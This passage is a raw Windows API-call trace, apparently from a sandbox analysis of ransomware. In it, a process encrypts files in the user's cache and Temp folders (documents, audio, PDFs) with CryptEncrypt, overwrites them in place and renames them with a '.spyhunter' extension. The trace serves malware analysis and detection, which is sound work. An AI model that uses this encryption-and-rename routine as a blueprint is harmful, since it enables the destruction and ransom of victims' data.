lpNewFilePointer=0xffffffff) returned 1 [0152.910] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x57eca4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57eca4*=0x2d7, lpOverlapped=0x0) returned 1 [0152.910] GetProcessHeap () returned 0x2c0000 [0152.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0152.910] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.910] WriteFile (in: hFile=0xb0, lpBuffer=0x57ece4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eca4, lpOverlapped=0x0 | out: lpBuffer=0x57ece4*, lpNumberOfBytesWritten=0x57eca4*=0x4, lpOverlapped=0x0) returned 1 [0152.911] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eca4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57eca4*=0x30, lpOverlapped=0x0) returned 1 [0152.911] CloseHandle (hObject=0xb0) returned 1 [0152.911] GetProcessHeap () returned 0x2c0000 [0152.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.911] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.spyhunter") returned 161 [0152.911] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.spyhunter")) returned 1 [0152.956] GetProcessHeap () returned 0x2c0000 [0152.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.956] GetProcessHeap () returned 0x2c0000 [0152.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.956] GetProcessHeap () returned 0x2c0000 [0152.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe0220 | out: hHeap=0x2c0000) returned 1 [0152.956] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ece0 | out: pbBuffer=0x57ece0) returned 1 [0152.956] GetProcessHeap () returned 0x2c0000 [0152.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.956] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecd8*=0x30) returned 1 [0152.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.957] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 151 [0152.958] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".txt") returned 0x0 [0152.958] GetProcessHeap () returned 0x2c0000 [0152.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0152.958] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec9c*=0x1d8, lpOverlapped=0x0) returned 1 [0152.958] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.959] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1d8, lpNumberOfBytesWritten=0x57ec9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec9c*=0x1d8, lpOverlapped=0x0) returned 1 [0152.959] GetProcessHeap () returned 0x2c0000 [0152.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0152.959] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.959] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec9c, lpOverlapped=0x0 | out: lpBuffer=0x57ecdc*, lpNumberOfBytesWritten=0x57ec9c*=0x4, lpOverlapped=0x0) returned 1 [0152.959] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec9c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec9c*=0x30, lpOverlapped=0x0) returned 1 [0152.959] CloseHandle (hObject=0xb0) returned 1 [0152.959] GetProcessHeap () returned 0x2c0000 [0152.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.959] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.spyhunter") returned 161 [0152.959] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.spyhunter")) returned 1 [0152.960] GetProcessHeap () returned 0x2c0000 [0152.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.960] GetProcessHeap () returned 0x2c0000 [0152.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.960] GetProcessHeap () returned 0x2c0000 [0152.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc9d28 | out: hHeap=0x2c0000) returned 1 [0152.960] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ece0 | out: pbBuffer=0x57ece0) returned 1 [0152.960] GetProcessHeap () returned 0x2c0000 [0152.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.960] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecd8*=0x30) returned 1 [0152.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.961] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 151 [0152.961] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".txt") returned 0x0 [0152.961] GetProcessHeap () returned 0x2c0000 [0152.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0152.961] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec9c*=0x561, lpOverlapped=0x0) returned 1 [0153.274] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffa9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.274] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x561, lpNumberOfBytesWritten=0x57ec9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec9c*=0x561, lpOverlapped=0x0) returned 1 [0153.274] GetProcessHeap () returned 0x2c0000 [0153.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.274] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.275] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec9c, lpOverlapped=0x0 | out: lpBuffer=0x57ecdc*, lpNumberOfBytesWritten=0x57ec9c*=0x4, lpOverlapped=0x0) returned 1 [0153.275] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec9c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec9c*=0x30, lpOverlapped=0x0) returned 1 [0153.275] CloseHandle (hObject=0xb0) returned 1 [0153.275] GetProcessHeap () returned 0x2c0000 [0153.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.275] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.spyhunter") returned 161 [0153.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.spyhunter")) returned 1 [0153.276] GetProcessHeap () returned 0x2c0000 [0153.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.276] GetProcessHeap () returned 0x2c0000 [0153.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.276] GetProcessHeap () returned 0x2c0000 [0153.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc9bb0 | out: hHeap=0x2c0000) returned 1 [0153.276] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecd8 | out: pbBuffer=0x57ecd8) returned 1 [0153.276] GetProcessHeap () returned 0x2c0000 [0153.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.276] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecd0*=0x30) returned 1 [0153.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0153.277] GetProcessHeap () returned 0x2c0000 [0153.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.277] GetProcessHeap () returned 0x2c0000 [0153.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85230 | out: hHeap=0x2c0000) returned 1 [0153.277] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecd8 | out: pbBuffer=0x57ecd8) returned 1 [0153.277] GetProcessHeap () returned 0x2c0000 [0153.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.277] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecd0*=0x30) returned 1 [0153.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0153.277] GetProcessHeap () returned 0x2c0000 [0153.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.277] GetProcessHeap () returned 0x2c0000 [0153.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84fd8 | out: hHeap=0x2c0000) returned 1 [0153.277] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecd0 | out: pbBuffer=0x57ecd0) returned 1 [0153.277] GetProcessHeap () returned 0x2c0000 [0153.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.277] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecc8*=0x30) returned 1 [0153.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CLHMKBO1Q69n.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\clhmkbo1q69n.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CLHMKBO1Q69n.doc") returned 69 [0153.278] StrStrW (lpFirst="CLHMKBO1Q69n.doc", lpSrch=".txt") returned 0x0 [0153.278] GetProcessHeap () returned 0x2c0000 [0153.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.278] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec8c*=0x2800, lpOverlapped=0x0) returned 1 [0153.279] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.279] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec8c*=0x2800, lpOverlapped=0x0) returned 1 [0153.279] GetProcessHeap () returned 0x2c0000 [0153.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.279] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.279] WriteFile (in: hFile=0xb0, lpBuffer=0x57eccc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec8c, lpOverlapped=0x0 | out: lpBuffer=0x57eccc*, lpNumberOfBytesWritten=0x57ec8c*=0x4, lpOverlapped=0x0) returned 1 [0153.280] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec8c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec8c*=0x30, lpOverlapped=0x0) returned 1 [0153.280] CloseHandle (hObject=0xb0) returned 1 [0153.280] GetProcessHeap () returned 0x2c0000 [0153.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.280] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CLHMKBO1Q69n.doc.spyhunter") returned 79 [0153.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CLHMKBO1Q69n.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\clhmkbo1q69n.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CLHMKBO1Q69n.doc.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\clhmkbo1q69n.doc.spyhunter")) returned 1 [0153.281] GetProcessHeap () returned 0x2c0000 [0153.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.281] GetProcessHeap () returned 0x2c0000 [0153.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.281] GetProcessHeap () returned 0x2c0000 [0153.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80b20 | out: hHeap=0x2c0000) returned 1 [0153.281] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecd0 | out: pbBuffer=0x57ecd0) returned 1 [0153.281] GetProcessHeap () returned 0x2c0000 [0153.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.282] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecc8*=0x30) returned 1 [0153.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CJ-d w8gYTe3y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cj-d w8gyte3y.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.282] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CJ-d w8gYTe3y.m4a") returned 70 [0153.282] StrStrW (lpFirst="CJ-d w8gYTe3y.m4a", lpSrch=".txt") returned 0x0 [0153.282] GetProcessHeap () returned 0x2c0000 [0153.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.282] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec8c*=0x2800, lpOverlapped=0x0) returned 1 [0153.283] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.283] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec8c*=0x2800, lpOverlapped=0x0) returned 1 [0153.283] GetProcessHeap () returned 0x2c0000 [0153.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.283] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.283] WriteFile (in: hFile=0xb0, lpBuffer=0x57eccc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec8c, lpOverlapped=0x0 | out: lpBuffer=0x57eccc*, lpNumberOfBytesWritten=0x57ec8c*=0x4, lpOverlapped=0x0) returned 1 [0153.284] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec8c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec8c*=0x30, lpOverlapped=0x0) returned 1 [0153.284] CloseHandle (hObject=0xb0) returned 1 [0153.284] GetProcessHeap () returned 0x2c0000 [0153.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.284] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CJ-d w8gYTe3y.m4a.spyhunter") returned 80 [0153.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CJ-d w8gYTe3y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cj-d w8gyte3y.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CJ-d w8gYTe3y.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cj-d w8gyte3y.m4a.spyhunter")) returned 1 [0153.285] GetProcessHeap () returned 0x2c0000 [0153.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.285] GetProcessHeap () returned 0x2c0000 [0153.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.285] GetProcessHeap () returned 0x2c0000 [0153.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80a48 | out: hHeap=0x2c0000) returned 1 [0153.285] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecc8 | out: pbBuffer=0x57ecc8) returned 1 [0153.285] GetProcessHeap () returned 0x2c0000 [0153.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.285] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecc0*=0x30) returned 1 [0153.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\bW7aH.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\bw7ah.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\bW7aH.pdf") returned 62 [0153.286] StrStrW (lpFirst="bW7aH.pdf", lpSrch=".txt") returned 0x0 [0153.286] GetProcessHeap () returned 0x2c0000 [0153.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.286] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec84, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec84*=0x2800, lpOverlapped=0x0) returned 1 [0153.286] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.286] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec84, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec84*=0x2800, lpOverlapped=0x0) returned 1 [0153.287] GetProcessHeap () returned 0x2c0000 [0153.287] HeapFree (in: 